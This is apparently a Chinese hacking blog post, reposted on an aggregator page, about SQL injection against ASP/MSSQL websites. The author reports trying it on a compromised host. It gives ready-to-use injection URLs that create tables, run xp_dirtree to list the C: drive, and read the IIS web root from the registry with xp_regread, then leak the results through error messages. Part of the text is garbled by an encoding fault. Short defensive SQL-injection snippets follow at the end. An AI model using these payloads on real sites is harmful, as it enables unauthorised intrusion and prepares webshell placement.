SQL注入路徑問題 作者 孤光劍隱

2021-03-31 08:56:57 字數 2101 閱讀 3491

下午沒什麼事情

看了看angel寫乙個路徑的問章 找了肉雞試了半天

費了牛勁了

我發現如果出現

microsoft ole db provider for sql server 錯誤 '80040e07'

將 varchar 值 '#sharedobjects' 轉換為資料型別為 int 的列時發生語法錯誤。

/html/showdetail_new.asp,行 9

這樣他的方法就不能用了

#必須給遮蔽掉

要飯的得到路徑的方法 偶也試了更是費勁啊

看看其中一句 我暈~

我要暈了

angel方法手工猜解管理後台路徑的成功機率很低,要用xp_dirtree來得到我們想要的資訊,下面的方法或許要簡單一點!第

一次公布出來,或許很多朋友在用,不過絕對非常好!我們把路徑寫到表裡去!

語句:http://http://.***xx.***/down/list.asp?id=1;create table dirs(paths varchar(100), id int)--

返回:正常的資訊!說明建表成功!繼續!

語句:http://http://.***xx.***/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'c:/'--

返回:正常資訊。說明寫入c盤的所有目錄成功了!爽!接下來就是取表了!暴它出來。

語句:http://http://.***xx.***/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-

返回:microsoft ole db provider for sql server 錯誤 '80040e07'

將 varchar 值 '@i***pub' 轉換為資料型別為 int 的列時發生語法錯誤。

再依次爆出表中的目錄名稱!

語句:http://http://.***xx.***/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@i***pub'))--

最後用同樣的方法測試得到網頁目錄放在e:/web下

臭要飯寫的!

1.怎麼拿到web絕對路徑?

呵呵?這個問題,花了我很長時間去研究。大家都知道ms的東西很多都放在登錄檔中的,web位置我們可以在註冊?br />碇械玫劍恢萌縵攏?br />hkey_local_machine/system/controlset001/services/w3svc/parameters/virtual roots

利用擴充套件儲存過程xp_regread我們可以取得它的值.

exec master.dbo.xp_regread 'hkey_local_machine',

'system/controlset001/services/w3svc/parameters/virtual roots', '/'

這樣,就取出來了,但問題又來了,取是取出來了,我們怎麼在ie中返回它的值呢?我的方法是:先建立乙個臨時

表,表中加一欄位,型別為:char 255。呵呵,用它來儲存web絕對路徑的值。表建好後,我們就用讀取登錄檔的方法,把返回的值儲存在一變數中。

然後向新建的表中加入記錄(即變數的值)。這樣,路徑就寫入到了表中。提交:

declare @result varchar(255) exec master.dbo.xp_regread 'hkey_local_machine',

'system/controlset001/services/w3svc/parameters/virtual roots', '/', @result output insert into 臨時表 (臨時欄位名) values( @result );--

然後,我們再提交: 1=(select count(*) from 臨時表 where 臨時欄位名》1)

這樣ie報錯,就把剛才插進去的web路徑的值報出來了。我也試過直接用變數來報錯,讓ie返回變數的值,結果是失

敗的,所以就想到了建臨時表加資料進去的方法!最後我們再刪除剛建的臨時表。

不要破壞國內主機~lis0在此提醒

sql 注入問題

1.關於使用intval強制轉換成數字的問題。數字大於2147483647會出現溢位出現負數。使用個方法來替代這個吧 n n a 2147483648.05555 echo intval a n result 2147483648 echo int a,n result 2147483648 ech...

SQL注入問題

什麼是sql注入問題?就是在拼接sql語句時,有一些sql的特殊關鍵字參與字串拼接,會咋總成安全問題 例如 輸入使用者民名和密碼時拼接sql語句 使用者名稱任意,密碼為乙個恒等式 select from user where usernamr sadfasfa 任意 and password a o...

SQL注入問題

sql 注入式攻擊是未將 與資料進行嚴格的隔離 導致在讀取使用者資料的時候 錯誤地把資料作為 的一部分執行而導致一些安全問題。sql 注入自誕生以來以其巨大的殺傷力聞名。典型的 sql注入的例子是當對 sql 語旬進行字串拼接操作時 直接使用未加轉義的使用者輸入內容作為變數 比如 var testc...